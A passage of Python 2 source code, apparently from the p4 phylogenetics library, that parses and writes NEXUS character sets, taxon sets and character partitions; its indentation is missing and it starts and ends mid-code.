if lowName in self.charPartitionLowNames:
gm.append("Duplicated charPartition name '%s'" % name)
raise P4Error(gm)
cp = CharPartition(self)
cp.name = name
cp.lowName = lowName
cp._readCharPartitionDefinition(flob)
self.charPartitions.append(cp)
self.charPartitionsDict[name] = cp
self.charPartitionLowNames.append(cp.lowName)
def dump(self):
print " NexusSets dump"
if self.constant:
print " Predefined char set 'constant'"
self.constant.dump()
if self.gapped:
print " Predefined char set 'gapped'"
self.gapped.dump()
print " There are %i non-predefined char sets" % len(self.charSets)
for cs in self.charSets:
cs.dump()
print " There are %i tax sets" % len(self.taxSets)
for ts in self.taxSets:
ts.dump()
print " There are %i char partitions" % len(self.charPartitions)
for cp in self.charPartitions:
cp.dump()
if self.charPartition:
print " self.charPartition.name is %s" % func.nexusFixNameIfQuotesAreNeeded(self.charPartition.name)
else:
print " There is no self.charPartition"
def write(self):
"""Write self in Nexus format to stdout."""
self.writeNexusToOpenFile(sys.stdout)
def writeNexus(self, fName=None):
"""Write self in Nexus format to stdout or a file."""
if fName:
f = file(fName, 'w')
else:
f = sys.stdout
f.write('#nexus\n\n')
self.writeNexusToOpenFile(f)
if fName:
f.close()
def writeNexusToOpenFile(self, flob):
"""This only writes non-trivial stuff.
Ie if self has only constant and gapped charsets, then it does
not write anything."""
if self.charSets or self.charPartitions or self.taxSets:
flob.write('begin sets;\n')
for cs in self.charSets:
cs.writeNexusToOpenFile(flob)
for cp in self.charPartitions:
cp.writeNexusToOpenFile(flob)
for ts in self.taxSets:
ts.writeNexusToOpenFile(flob)
flob.write('end;\n\n')
def newCharSet(self, name, mask=None):
cs = CharSet(self)
cs.name = name
cs.lowName = name.lower()
cs.num = len(self.charSets)
if mask:
cs.format = 'vector'
cs.mask = mask
else:
pass
self.charSets.append(cs)
self.charSetsDict[cs.name] = cs
def dupeCharSet(self, existingCharSetName, newName):
theCS = self.charSetsDict.get(existingCharSetName)
if not theCS:
raise P4Error(
"NexusSets.dupeCharSet() -- can't find char set '%s'" % existingCharSetName)
cs = CharSet(self)
cs.name = newName
cs.lowName = newName.lower()
cs.num = len(self.charSets)
self.charSets.append(cs)
self.charSetsDict[cs.name] = cs
cs.format = theCS.format
cs.triplets = copy.deepcopy(theCS.triplets) # its a list of lists
cs.tokens = theCS.tokens[:]
cs.mask = theCS.mask
cs.aligNChar = theCS.aligNChar
class TaxOrCharSet(object):
def __init__(self, theNexusSets):
self.nexusSets = theNexusSets
self.num = -1
self.name = None
self.lowName = None
self._format = 'standard' # or 'vector' So it should be a property.
self.triplets = []
self.tokens = []
self.mask = None
self.className = 'TaxOrCharSet'
self.lowTaxNames = []
self.taxNames = []
self.useTaxNames = None # undecided
def _getFormat(self):
return self._format
def _setFormat(self, newFormat):
assert newFormat in ['standard', 'vector']
self._format = newFormat
format = property(_getFormat, _setFormat)
def dump(self):
print " %s %i" % (self.className, self.num)
print " name: %s" % self.name
if hasattr(self, 'aligNChar'):
print " aligNChar: %s" % self.aligNChar
print " format: %s" % self.format
if hasattr(self, 'useTaxNames'):
print " useTaxNames: %s" % self.useTaxNames
print " triplets: "
for t in self.triplets:
print " %s" % t
if hasattr(self, 'numberTriplets'):
print " numberTriplets: "
for t in self.numberTriplets:
print " %s" % t
print " tokens: %s" % self.tokens
print " mask: %s" % self.mask
if self.mask:
print " mask 1s-count: %s" % self.mask.count('1')
def readTaxOrCharSetDefinition(self, flob):
gm = ['%s.readTaxSetDefinition()' % self.className]
if hasattr(flob, 'name') and flob.name:
gm.append("file name %s" % flob.name)
tok = safeNextTok(flob, gm[0])
lowTok = string.lower(tok)
# print "readTaxSetDefinition: get tok '%s'" % tok
if lowTok == '=':
pass
elif lowTok == '(':
#['standard', 'vector']:
tok = func.nexusUnquoteName(safeNextTok(flob, gm[0]))
lowTok = string.lower(tok)
if lowTok == 'standard':
pass
elif lowTok == 'vector':
self.format = 'vector'
else:
gm.append("Unexpected '%s'" % tok)
gm.append("(I was expecting either 'standard' or")
gm.append("'vector' following the parenthesis.)")
raise P4Error(gm)
tok = func.nexusUnquoteName(safeNextTok(flob, gm[0]))
if tok == ')':
pass
else:
gm.append("Unexpected '%s'" % tok)
gm.append(
"(I was expecting an unparentheis after '%s')" % self.format)
raise P4Error(gm)
tok = func.nexusUnquoteName(safeNextTok(flob, gm[0]))
if tok != '=':
gm.append("Unexpected '%s'" % tok)
gm.append("I was expecting an '=' after '(%s)'" % self.format)
raise P4Error(gm)
else:
gm.append("Unexpected '%s'" % tok)
raise P4Error(gm)
# Now we are on the other side of the '='
tok = func.nexusUnquoteName(safeNextTok(flob, gm[0]))
lowTok = string.lower(tok)
while lowTok not in [None, ';', 'end', 'endblock']:
self.tokens.append(tok)
tok = func.nexusUnquoteName(safeNextTok(flob, gm[0]))
lowTok = string.lower(tok)
if self.format == 'vector':
self.mask = string.join(self.tokens, '')
self.tokens = []
for i in range(len(self.mask)):
if self.mask[i] not in ['0', '1']:
gm.append("%s '%s', vector format" %
(self.className, self.name))
gm.append("The vector must be all zeros or ones.")
raise P4Error(gm)
# print self.mask
# do a once-over sanity check, and convert integer strings to ints
# print "xx1 self.tokens is now %s" % self.tokens
for tokNum in range(len(self.tokens)):
tok = self.tokens[tokNum]
lowTok = string.lower(tok)
if lowTok in ['.', 'all', '-', '\\']:
pass
elif self.className == 'CharSet' and lowTok in self.nexusSets.charSetLowNames:
# print " xx3 %s is an existing charSet" % tok
pass
elif self.className == 'CharSet' and lowTok in self.nexusSets.predefinedCharSetLowNames:
# print " xx3 %s is a pre-defined charSet" % tok
pass
elif self.className == 'TaxSet' and lowTok in self.nexusSets.taxSetLowNames:
# print " xx4 %s is an existing taxSet" % tok
pass
else:
# print " xx5"
try:
intTok = int(tok)
self.tokens[tokNum] = intTok
except ValueError:
if self.className == 'TaxSet':
pass
elif self.className == 'CharSet':
gm.append("I don't understand the token '%s'" % tok)
raise P4Error(gm)
# Now I want to make a list of triplets representing eg 23-87\3
# first item = 23, second item = 87, third = 3
# not all will exist for each part of the char definition.
tokNum = 0
self.triplets = []
while tokNum < len(self.tokens):
tok = self.tokens[tokNum]
# print "Considering tok[%i] '%s'" % (tokNum, tok)
if type(tok) == type('str'):
lowTok = string.lower(tok)
else:
lowTok = None
if self.className == 'TaxSet' and lowTok in self.nexusSets.taxSetLowNames or \
self.className == 'CharSet' and lowTok in self.nexusSets.charSetLowNames:
aTriplet = [tok, None, None]
self.triplets.append(aTriplet)
tokNum += 1
if tokNum < len(self.tokens):
if self.tokens[tokNum] == '-':
gm.append("%s '%s' definition" %
(self.className, self.name))
gm.append(
"An existing tax or char set may not be followed by a '-'")
raise P4Error(gm)
if self.tokens[tokNum] == '\\':
gm.append("%s '%s' definition" %
(self.className, self.name))
gm.append(
"An existing tax or char set may not be followed by a '\\'")
raise P4Error(gm)
elif tok == 'all':
aTriplet = [tok, None, None]
self.triplets.append(aTriplet)
tokNum += 1
if tokNum < len(self.tokens):
if self.tokens[tokNum] == '-':
gm.append("%s '%s' definition" %
(self.className, self.name))
gm.append(
"Tax or char set 'all' may not be followed by a '-'")
raise P4Error(gm)
if self.tokens[tokNum] == '\\':
gm.append("%s '%s' definition" %
(self.className, self.name))
gm.append(
"Tax or char set 'all' may not be followed by a '\\'")
raise P4Error(gm)
elif tok == '-':
gm.append("%s '%s' definition" % (self.className, self.name))
gm.append("Out of place '-'")
raise P4Error(gm)
elif tok == '\\':
gm.append("%s '%s' definition" % (self.className, self.name))
gm.append("Out of place '\\'")
raise P4Error(gm)
elif tok == '.':
aTriplet = [tok, None, None]
self.triplets.append(aTriplet)
tokNum += 1
if tokNum < len(self.tokens):
if self.tokens[tokNum] == '-':
gm.append("%s '%s' definition" %
(self.className, self.name))
gm.append(
"Tax or char set '.' may not be followed by a '-'")
raise P4Error(gm)
if self.tokens[tokNum] == '\\':
gm.append("%s '%s' definition" %
(self.className, self.name))
gm.append(
"Tax or char set '.' may not be followed by a '\\'")
raise P4Error(gm)
elif type(tok) == type(1) or type(tok) == type('str'):
aTriplet = [tok, None, None]
tokNum += 1
if tokNum < len(self.tokens):
if self.tokens[tokNum] == '-':
tokNum += 1
if tokNum < len(self.tokens):
# maybe '.'
if type(self.tokens[tokNum]) == type('str'):
aTriplet[1] = self.tokens[tokNum]
elif type(self.tokens[tokNum]) == type(1):
if type(aTriplet[0]) == type(1):
if self.tokens[tokNum] > aTriplet[0]:
aTriplet[1] = self.tokens[tokNum]
else:
gm.append(
"%s '%s' definition" % (self.className, self.name))
gm.append(
"If a range is defined by two numbers,")
# gm.append("(as it appears to be -- %s %s %s)" % (
# aTriplet[0], aTriplet[1],
# aTriplet[2]))
gm.append(
"the second number of a range must be bigger than")
gm.append("the first.")
raise P4Error(gm)
else:
aTriplet[1] = self.tokens[tokNum]
else:
raise P4Error(gm)
tokNum += 1
if tokNum < len(self.tokens):
if self.tokens[tokNum] == '\\':
tokNum += 1
if tokNum < len(self.tokens):
if type(self.tokens[tokNum]) == type(1):
aTriplet[2] = self.tokens[tokNum]
else:
gm.append(
"%s '%s' definition" % (self.className, self.name))
gm.append(
"Step value of a range must be a number")
gm.append("(Got '%s')" %
self.tokens[tokNum])
raise P4Error(gm)
tokNum += 1
self.triplets.append(aTriplet)
# print "xxy self.mask = %s" % self.mask
if not self.triplets and not self.mask:
if not var.allowEmptyCharSetsAndTaxSets:
gm.append("%s '%s' definition" % (self.className, self.name))
gm.append("Got no definition (no triplets or mask)")
gm.append("(Allow this by turning var.allowEmptyCharSetsAndTaxSets on)")
raise P4Error(gm)
if 0:
print gm[0]
print " Got self.triplets %s" % self.triplets
def setMask(self):
"""Set self.mask."""
gm = ["%s.setMask() name='%s'" % (self.className, self.name)]
if self.format == 'vector':
if self.mask:
pass
else:
gm.append("vector format, but no mask?")
raise P4Error(gm)
elif self.format == 'standard':
if 0:
print gm[0]
self.dump()
if not len(self.triplets):
if not var.allowEmptyCharSetsAndTaxSets:
gm.append(
"standard format, but we have no triplets? - no definition?")
gm.append("(Allow this by turning var.allowEmptyCharSetsAndTaxSets on.)")
raise P4Error(gm)
if self.className == 'CharSet':
thisMaskLen = self.aligNChar
existingSetNames = self.nexusSets.charSetLowNames
existingSets = self.nexusSets.charSets
theTriplets = self.triplets
elif self.className == 'TaxSet':
thisMaskLen = self.nexusSets.nTax
existingSetNames = self.nexusSets.taxSetLowNames
existingSets = self.nexusSets.taxSets
theTriplets = self.numberTriplets
mask = array.array('c', thisMaskLen * '0')
for aTriplet in theTriplets:
if 0:
print gm[0]
print " '%s' aTriplet=%s" % (self.name, aTriplet)
first = aTriplet[0]
second = aTriplet[1]
third = aTriplet[2]
lowFirst = None
lowSecond = None
if type(first) == type('str'):
lowFirst = string.lower(first)
if type(second) == type('str'):
lowSecond = string.lower(second)
# its a single, or an existing set, not a range
if first and not second:
if lowFirst:
if lowFirst == 'all':
for i in range(thisMaskLen):
mask[i] = '1'
if lowFirst in existingSetNames:
for aSet in existingSets:
if lowFirst == aSet.lowName:
if not aSet.mask:
aSet.setMask()
for j in range(thisMaskLen):
if aSet.mask[j] == '1':
mask[j] = '1'
# Maybe its a predefined charset --- constant or gapped
elif self.className == 'CharSet' and lowFirst in self.nexusSets.predefinedCharSetLowNames:
aSet = None
if lowFirst == 'constant':
aSet = self.nexusSets.constant
elif lowFirst == 'gapped':
aSet = self.nexusSets.gapped
assert aSet
for j in range(thisMaskLen):
if aSet.mask[j] == '1':
mask[j] = '1'
else:
gm.append("I don't know '%s'" % first)
raise P4Error(gm)
elif first == '.':
mask[-1] = '1'
elif type(first) == type(1):
if first > 0 and first <= thisMaskLen:
mask[first - 1] = '1'
else:
# This will have been checked before.
gm.append(
"Component '%s' is out of range of mask len (%s)" % (first, thisMask))
raise P4Error(gm)
elif first and second:
# Its a range.
start = int(first)
if second == '.':
fin = len(mask)
else:
fin = int(second)
if third:
bystep = int(third)
# print "mask len %i, start-1 %i, fin %i, bystep %i" %
# (len(mask), (start-1), fin, bystep)
for spot in range(start - 1, fin, bystep):
mask[spot] = '1'
else:
for spot in range(start - 1, fin):
mask[spot] = '1'
# print " finished incorporating triplet %s into
# '%s' mask." % (aTriplet, self.name)
mask = mask.tostring()
# print "Got char set '%s' mask '%s'" % (self.name, mask)
self.mask = mask
def invertMask(self):
"""Change zeros to ones, and non-zeros to zero."""
gm = ['%s.invertMask()' % self.className]
if not self.mask:
self.dump()
gm.append("The charset has no mask")
raise P4Error(gm)
self.mask = list(self.mask)
for i in range(len(self.mask)):
if self.mask[i] == '0':
self.mask[i] = '1'
else:
self.mask[i] = '0'
self.mask = string.join(self.mask, '')
def write(self):
"""Write self in Nexus format to stdout."""
self.writeNexusToOpenFile(sys.stdout)
def writeNexus(self):
"""Write self in Nexus format to stdout."""
self.writeNexusToOpenFile(sys.stdout)
def writeNexusToOpenFile(self, flob):
if self.className == 'CharSet':
theSetName = 'charSet'
else:
theSetName = 'taxSet'
if self.format == 'standard':
flob.write(' %s %s =' % (theSetName, self.name))
if self.useTaxNames:
for tN in self.taxNames:
flob.write(" %s" % func.nexusFixNameIfQuotesAreNeeded(tN))
else:
# for i in self.tokens:
# flob.write(' %s' % i)
previousTok = None
for theTok in self.tokens:
if type(theTok) == types.StringType:
if theTok not in ['-', '\\']:
tok = func.nexusFixNameIfQuotesAreNeeded(theTok)
else:
tok = theTok
else:
tok = theTok
if previousTok != None:
# tokens will be either ints or strings
previousType = type(previousTok)
# print "previousTok = %s, previousType = %s" %
# (previousTok, previousType)
# usually put in a space
if type(tok) == previousType:
# except in this case
if tok in ['-'] or previousTok in ['-']:
flob.write('%s' % tok)
else:
flob.write(' %s' % tok)
else: # usually no space
if tok in ['-'] or previousTok in ['-']:
flob.write('%s' % tok)
else: # except in this case
flob.write(' %s' % tok)
previousTok = tok
# print "previousTok = %s, previousType = %s" %
# (previousTok, previousType)
else:
flob.write(' %s' % tok)
previousTok = tok
flob.write(';\n')
elif self.format == 'vector':
flob.write(' %s %s (vector) = ' % (theSetName, self.name))
flob.write('%s;\n' % self.mask)
def vectorize(self):
if self.format == 'vector':
return
if not self.mask:
self.setMask()
#self.triplets = []
#self.tokens = []
self.format = 'vector'
def standardize(self):
if self.format == 'standard':
return
self.triplets = []
self.tokens = []
thisTriplet = []
for mPos in range(len(self.mask)):
# print "mPos=%i mask=%s thisTriplet=%s" % (mPos,
# self.mask[mPos], thisTriplet)
if self.mask[mPos] == '0':
if thisTriplet:
if thisTriplet[0] == mPos:
thisTriplet.append(None)
thisTriplet.append(None)
else:
thisTriplet.append(mPos)
thisTriplet.append(None)
# print " finished triplet -- %s" % thisTriplet
self.triplets.append(thisTriplet)
thisTriplet = []
else:
if thisTriplet:
pass
else:
thisTriplet.append(mPos + 1)
# print " started triplet -- %s" % thisTriplet
if thisTriplet:
if thisTriplet[0] == len(self.mask):
thisTriplet.append(None)
thisTriplet.append(None)
else:
thisTriplet.append(mPos + 1)
thisTriplet.append(None)
# print " finished last triplet -- %s" % thisTriplet
self.triplets.append(thisTriplet)
# print self.triplets
for triplet in self.triplets:
if triplet[1] == None:
self.tokens.append(triplet[0])
else:
self.tokens.append(triplet[0])
self.tokens.append('-')
self.tokens.append(triplet[1])
self.format = 'standard'
# self.dump()
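# A small worked example (illustrative, not from the original docs): for a
# six-character mask '011100', standardize() builds the single triplet
# [2, 4, None] and the tokens [2, '-', 4], i.e. the standard-format range "2-4".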
class CharSet(TaxOrCharSet):
def __init__(self, theNexusSets):
TaxOrCharSet.__init__(self, theNexusSets)
self.className = 'CharSet'
self.aligNChar = None
def getNChar(self):
self.setMask()
return self.mask.count('1')
def setAligNChar(self, aligNChar):
gm = ['CharSet.setAligNChar()']
# print "CharSet name=%s, format=%s, aligNChar=%i" % (self.name,
# self.format, aligNChar)
self.aligNChar = aligNChar
if self.format == 'standard':
for aTriplet in self.triplets:
first = aTriplet[0]
second = aTriplet[1]
third = aTriplet[2]
if first and not second: # its a single
if type(first) == type(1):
if first > 0 and first <= self.aligNChar:
pass
else:
gm.append("Charset '%s' definition" % self.name)
gm.append(
"Charset definition element '%s' is out of range" % first)
gm.append("(aligNChar = %i)" % self.aligNChar)
raise P4Error(gm)
pass
elif first and second: # its a range
try:
start = int(first)
except ValueError:
gm.append("Charset '%s' definition" % self.name)
gm.append(
"Can't parse definition element '%s'" % first)
raise P4Error(gm)
if second == '.':
fin = self.aligNChar
else:
try:
fin = int(second)
except ValueError:
gm.append("Charset '%s' definition" % self.name)
gm.append(
"Can't parse definition element '%s'" % second)
raise P4Error(gm)
if third:
try:
bystep = int(third)
except ValueError:
gm.append("Charset '%s' definition" % self.name)
gm.append(
"Can't parse definition element '%s'" % third)
raise P4Error(gm)
elif self.format == 'vector':
# print "charset %s, vector format %s, mask %s" % (self.name,
# self.format, self.mask)
if self.mask:
if len(self.mask) == self.aligNChar:
pass
else:
gm.append("len(self.mask) is %i, but aligNChar is %i" % (
len(self.mask), self.aligNChar))
raise P4Error(gm)
else:
gm.append("bad format %s" % self.format)
raise P4Error(gm)
class TaxSet(TaxOrCharSet):
def __init__(self, theNexusSets):
TaxOrCharSet.__init__(self, theNexusSets)
self.className = 'TaxSet'
self.numberTriplets = []
def setNumberTriplets(self):
gm = ['TaxSet.setNumberTriplets()']
if not self.nexusSets.lowTaxNames:
self.nexusSets.lowTaxNames = [
string.lower(txName) for txName in self.nexusSets.taxNames]
self.numberTriplets = []
# print "self.triplets = %s" % self.triplets
for tr in self.triplets:
# print "setNumberTriplets() tr=%s" % tr
numTr = []
for itemNum in range(2):
trItem = tr[itemNum]
# print " considering '%s'" % trItem
if trItem == None:
numTr.append(trItem)
elif type(trItem) == type(1):
numTr.append(trItem)
elif trItem == '.':
numTr.append(self.nexusSets.nTax)
else:
assert type(trItem) == type('str')
lowTrItem = string.lower(trItem)
if lowTrItem in self.nexusSets.taxSetLowNames:
numTr.append(trItem)
else:
if lowTrItem not in self.nexusSets.lowTaxNames:
gm.append("Triplet %s" % tr)
gm.append(
"'%s' is a string, but not in the taxNames." % trItem)
raise P4Error(gm)
theIndx = self.nexusSets.lowTaxNames.index(lowTrItem)
theIndx += 1
numTr.append(theIndx)
trItem = tr[2]
if trItem == None:
numTr.append(None)
else:
assert type(trItem) == type(1)
numTr.append(trItem)
assert len(numTr) == 3
# print numTr
first = numTr[0]
# first might be a pre-existing taxSet name
if type(first) == type('str'):
pass
else:
second = numTr[1]
assert type(first) == type(1) and first != 0
if type(second) == type(1):
assert second != 0
if second <= first:
gm.append("Triplet %s" % tr)
gm.append("Triplet expressed as numbers. %s" % numTr)
gm.append(
"This appears to be a range, but the second number")
gm.append("is not bigger than the first.")
raise P4Error(gm)
assert second <= self.nexusSets.nTax
assert first <= self.nexusSets.nTax
self.numberTriplets.append(numTr)
def setUseTaxNames(self):
if self.useTaxNames:
return
# if not self.mask:
# self.setMask()
if not self.taxNames:
for pos in range(len(self.mask)):
c = self.mask[pos]
if c == '1':
self.taxNames.append(self.nexusSets.taxNames[pos])
self.useTaxNames = True
class CharPartitionSubset(object):
def __init__(self):
self.name = None
self.lowName = None
self.tokens = []
self.mask = None
self.triplets = []
def dump(self):
print " -- CharPartitionSubset"
print " name: %s" % func.nexusFixNameIfQuotesAreNeeded(self.name)
print " triplets: "
for t in self.triplets:
print " %s" % t
print " tokens: %s" % self.tokens
# for t in self.tokens:
# print " %s" % t
print " mask: %s" % self.mask
def writeNexusToOpenFile(self, flob):
flob.write('%s:' % self.name)
# print self.tokens
# for i in self.tokens:
# flob.write(' %s' % i)
previousTok = None
for i in self.tokens:
if previousTok != None:
# tokens will be either ints or strings
previousType = type(previousTok)
# print "previousTok = %s, previousType = %s" % (previousTok,
# previousType)
if type(i) == previousType: # put in a space
flob.write(' %s' % i)
else: # no space
flob.write('%s' % i)
previousTok = i
else:
flob.write(' %s' % i)
previousTok = i
class CharPartition(object):
def __init__(self, theNexusSets):
self.nexusSets = theNexusSets
self.name = None
self.lowName = None
self.tokens = []
self.subsets = []
def _readCharPartitionDefinition(self, flob):
gm = ['CharPartition._readCharPartitionDefinition()']
if hasattr(flob, 'name') and flob.name:
gm.append("file name %s" % flob.name)
tok = func.nexusUnquoteName(safeNextTok(flob, gm[0]))
lowTok = string.lower(tok)
while lowTok != '=':
if lowTok == '(':
tok = func.nexusUnquoteName(safeNextTok(flob, gm[0]))
lowTok = string.lower(tok)
while lowTok != ')':
if lowTok in ['notokens', 'vector']:
gm.append("Got charpartition modifier: '%s'" % tok)
gm.append("It is not implemented.")
gm.append(
"Only 'tokens' and 'standard' are implemented.")
raise P4Error(gm)
elif lowTok in ['tokens', 'standard']:
pass
else:
gm.append("Got charpartition modifier: '%s'" % tok)
gm.append("This is not understood.")
gm.append(
"(Only 'tokens' and 'standard' are implemented.)")
raise P4Error(gm)
tok = func.nexusUnquoteName(safeNextTok(flob, gm[0]))
lowTok = string.lower(tok)
else:
gm.append("Got unexpected token: '%s'" % tok)
gm.append(
"I was expecting either an '=' or something in parentheses.")
raise P4Error(gm)
tok = func.nexusUnquoteName(safeNextTok(flob, gm[0]))
lowTok = string.lower(tok)
while lowTok not in [None, ';', 'end', 'endblock']:
self.tokens.append(tok)
tok = func.nexusUnquoteName(safeNextTok(flob, gm[0]))
lowTok = string.lower(tok)
# print "_readCharPartitionDefinition: tokens %s" % self.tokens
# Divide into CharPartitionSubset instances
i = 0
while i < len(self.tokens):
aSubset = CharPartitionSubset()
aSubset.name = self.tokens[i]
if not func.nexusCheckName(aSubset.name):
gm.append("CharPartition '%s' definition:" % self.name)
gm.append("Bad subset name (%s, I think)" % aSubset.name)
raise P4Error(gm)
aSubset.lowName = string.lower(aSubset.name)
i += 1
if i >= len(self.tokens):
gm.append("CharPartition '%s' definition:" % self.name)
gm.append(
"Subset name (%s) should be followed by a colon" % aSubset.name)
raise P4Error(gm)
if self.tokens[i] != ':':
gm.append("CharPartition '%s' definition:" % self.name)
gm.append(
"Subset name (%s) should be followed by a colon" % aSubset.name)
raise P4Error(gm)
i += 1
if i >= len(self.tokens):
gm.append("CharPartition '%s' definition:" % self.name)
gm.append(
"Subset name (%s) and colon should be followed" % aSubset.name)
gm.append(
"by a subset definition (charSet or charSet definition)")
raise P4Error(gm)
while i < len(self.tokens) and self.tokens[i] != ',':
aSubset.tokens.append(self.tokens[i])
i += 1
i += 1
self.subsets.append(aSubset)
# do a once-over sanity check,
# check for duplicated names
# and convert integer strings to ints
existingPartNames = []
for aSubset in self.subsets:
# print "Checking charPartitionPart '%s'" % aSubset.name
# print " existingPartNames '%s'" % existingPartNames
if aSubset.lowName in existingPartNames:
gm.append("CharPartition '%s' definition:" % self.name)
gm.append("Duplicated subset name (%s, I think)" %
aSubset.name)
raise P4Error(gm)
existingPartNames.append(aSubset.lowName)
for i in range(len(aSubset.tokens)):
tok = aSubset.tokens[i]
lowTok = string.lower(tok)
# print "considering '%s', ord(lowTok[0])=%i" % (lowTok,
# ord(lowTok[0]))
# Does not pick up '.'!!!!
if lowTok in ['.', 'all', '-', '\\', 'remainder']:
pass
elif lowTok in self.nexusSets.charSetLowNames:
pass
elif lowTok in self.nexusSets.predefinedCharSetLowNames:
pass
else:
# print " lowTok=%s, ord(lowTok[0])=%s, ord('.')=%s" % (
# lowTok, ord(lowTok[0]), ord('.'))
try:
intTok = int(tok)
aSubset.tokens[i] = intTok
except ValueError:
gm.append("CharPartition '%s' definition:" % self.name)
gm.append("Can't understand '%s' in subset '%s' definition" %
(tok, aSubset.name))
gm.append(
"(If you are using read('whatever'), and there are backslashes,")
gm.append(
"are you using raw strings, ie read(r'whatever')?)")
raise P4Error(gm)
def setSubsetMasks(self):
"""Make charParititionSubset.mask's appropriate to the Alignment.
This is called by theAlignment.setCharPartition().
"""
gm = ['CharPartition.setSubsetMasks()']
assert self.nexusSets.aligNChar
# Make a list of triplets representing eg 23-87\3
# first item = 23, second item = 87, third = 3
# Not all will exist for each part of the char definition.
for aSubset in self.subsets:
i = 0
aSubset.triplets = []
while i < len(aSubset.tokens):
tok = aSubset.tokens[i]
if type(tok) == type('string'):
lowTok = string.lower(tok)
else:
lowTok = None
# print "Doing triplets: looking at tok '%s'" % tok
if lowTok and lowTok in self.nexusSets.charSetLowNames or \
lowTok in self.nexusSets.predefinedCharSetLowNames:
aTriplet = [lowTok, None, None]
aSubset.triplets.append(aTriplet)
i += 1
if i < len(aSubset.tokens):
if aSubset.tokens[i] == '-':
gm.append(
"CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" % aSubset.name)
gm.append(
"An existing char set may not be followed by a '-'")
raise P4Error(gm)
if aSubset.tokens[i] == '\\':
gm.append(
"CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" % aSubset.name)
gm.append(
"An existing char set may not be followed by a '\\'")
raise P4Error(gm)
elif lowTok in ['all', 'remainder']:
aTriplet = [lowTok, None, None]
aSubset.triplets.append(aTriplet)
i += 1
if lowTok == 'remainder' and i < len(aSubset.tokens):
gm.append("CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" % aSubset.name)
gm.append(
"Char set 'remainder' must be the last one in the charPartition definition")
raise P4Error(gm)
if i < len(aSubset.tokens):
if aSubset.tokens[i] == '-':
gm.append(
"CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" % aSubset.name)
gm.append(
"Char set '%s' may not be followed by a '-'" % lowTok)
raise P4Error(gm)
if aSubset.tokens[i] == '\\':
gm.append(
"CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" % aSubset.name)
gm.append(
"Char set '%s' may not be followed by a '\\'" % lowTok)
raise P4Error(gm)
elif tok == '-':
gm.append("CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" % aSubset.name)
gm.append("Out of place '-'")
raise P4Error(gm)
elif tok == '\\':
gm.append("CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" % aSubset.name)
gm.append("Out of place '\\'")
raise P4Error(gm)
elif tok == '.':
aTriplet = [tok, None, None]
aSubset.triplets.append(aTriplet)
i += 1
if i < len(aSubset.tokens):
if aSubset.tokens[i] == '-':
gm.append(
"CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" % aSubset.name)
gm.append(
"Char set '.' may not be followed by a '-'")
raise P4Error(gm)
if aSubset.tokens[i] == '\\':
gm.append(
"CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" % aSubset.name)
gm.append(
"Char set '.' may not be followed by a '\\'")
raise P4Error(gm)
elif type(tok) == type(1):
aTriplet = [tok, None, None]
i = i + 1
if i < len(aSubset.tokens):
if aSubset.tokens[i] == '-':
i = i + 1
if i < len(aSubset.tokens):
if aSubset.tokens[i] == '.':
aTriplet[1] = aSubset.tokens[i]
elif type(aSubset.tokens[i]) == type(1):
if aSubset.tokens[i] > aTriplet[0]:
aTriplet[1] = aSubset.tokens[i]
else:
gm.append(
"CharPartition '%s' definition" % self.name)
gm.append(
"Subset '%s' definition" % aSubset.name)
gm.append(
"Second number of a character range must be bigger than")
gm.append("the first.")
raise P4Error(gm)
else:
gm.append(
"CharPartition '%s' definition" % self.name)
gm.append(
"Subset '%s' definition" % aSubset.name)
gm.append(
"Second item of a character range must be either a")
gm.append(
"number or a '.'. I got '%s'" % aSubset.tokens[i])
raise P4Error(gm)
i = i + 1
if i < len(aSubset.tokens):
if aSubset.tokens[i] == '\\':
i = i + 1
if i < len(aSubset.tokens):
if type(aSubset.tokens[i]) == type(1):
aTriplet[2] = aSubset.tokens[i]
else:
gm.append(
"CharPartition '%s' definition" % self.name)
gm.append(
"Subset '%s' definition" % aSubset.name)
gm.append(
"Step value of a range must be a number")
gm.append(
"(Got '%s')" % aSubset.tokens[i])
raise P4Error(gm)
i = i + 1
aSubset.triplets.append(aTriplet)
else:
gm.append("CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" % aSubset.name)
gm.append("token '%s' is not understood." % tok)
raise P4Error(gm)
if 0:
print gm[0]
print "Got aSubset (%s) triplets %s" % (aSubset.name, aSubset.triplets)
# sys.exit()
aSubset.mask = array.array('c', self.nexusSets.aligNChar * '0')
for aTriplet in aSubset.triplets:
# print "setSubsetMasks() Looking at triplet '%s'" % aTriplet
first = aTriplet[0]
second = aTriplet[1]
third = aTriplet[2]
lowFirst = None
lowSecond = None
if type(first) == type('str'):
lowFirst = string.lower(first)
if type(second) == type('str'):
lowSecond = string.lower(second)
if first and not second: # its a single
# print "Got single: %s" % first
if lowFirst == 'all':
for i in range(self.nexusSets.aligNChar):
aSubset.mask[i] = '1'
elif lowFirst in self.nexusSets.predefinedCharSetLowNames:
theCS = None
if lowFirst == 'constant':
theCS = self.nexusSets.constant
elif lowFirst == 'gapped':
theCS = self.nexusSets.gapped
assert theCS
assert theCS.mask
for j in range(self.nexusSets.aligNChar):
if theCS.mask[j] == '1':
aSubset.mask[j] = '1'
elif lowFirst in self.nexusSets.charSetLowNames:
theCS = None
for cs in self.nexusSets.charSets:
if lowFirst == cs.lowName:
theCS = cs
break
assert theCS
assert theCS.mask
for j in range(self.nexusSets.aligNChar):
if theCS.mask[j] == '1':
aSubset.mask[j] = '1'
# Its legit to use this as a single char.
elif first == '.':
aSubset.mask[-1] = '1'
elif type(first) == type(1):
if first > 0 and first <= self.nexusSets.aligNChar:
aSubset.mask[first - 1] = '1'
else:
gm.append(
"CharPartition '%s' definition" % self.name)
gm.append("Subset '%s' definition" % aSubset.name)
gm.append(
"Charset definition element '%s' is out of range" % first)
gm.append("(aligNChar = %i)" %
self.nexusSets.aligNChar)
raise P4Error(gm)
elif lowFirst == 'remainder':
# print "Got first == remainder"
for i in range(self.nexusSets.aligNChar):
aSubset.mask[i] = '1'
# print "Got new aSubset.mask = %s" % aSubset.mask
for ss in self.subsets[:-1]:
if ss.mask:
# print "Previous mask: %s" % ss.mask
